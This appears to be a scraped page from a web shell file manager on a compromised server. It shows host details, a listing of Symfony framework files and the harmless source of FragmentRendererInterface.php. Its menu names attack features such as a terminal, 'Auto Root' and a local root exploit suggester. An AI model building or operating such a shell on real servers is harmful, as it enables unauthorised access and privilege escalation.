Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.30
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
http-kernel /
Fragment /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractSurrogateFragmentRenderer.php
3.5
KB
-rw-rw-r--
2022-07-29 12:30
EsiFragmentRenderer.php
563
B
-rw-rw-r--
2022-07-29 12:30
FragmentHandler.php
3.64
KB
-rw-rw-r--
2022-07-29 12:30
FragmentRendererInterface.php
996
B
-rw-rw-r--
2022-07-29 12:30
FragmentUriGenerator.php
3.46
KB
-rw-rw-r--
2022-07-29 12:30
FragmentUriGeneratorInterface.php
1.01
KB
-rw-rw-r--
2022-07-29 12:30
HIncludeFragmentRenderer.php
3.27
KB
-rw-rw-r--
2022-07-29 12:30
InlineFragmentRenderer.php
4.91
KB
-rw-rw-r--
2022-07-29 12:30
RoutableFragmentRenderer.php
1.47
KB
-rw-rw-r--
2022-07-29 12:30
SsiFragmentRenderer.php
563
B
-rw-rw-r--
2022-07-29 12:30
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Fragment; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpKernel\Controller\ControllerReference; /** * Interface implemented by all rendering strategies. * * @author Fabien Potencier <fabien@symfony.com> */ interface FragmentRendererInterface { /** * Renders a URI and returns the Response content. * * @param string|ControllerReference $uri A URI as a string or a ControllerReference instance * * @return Response */ public function render($uri, Request $request, array $options = []); /** * Gets the name of the strategy. * * @return string */ public function getName(); }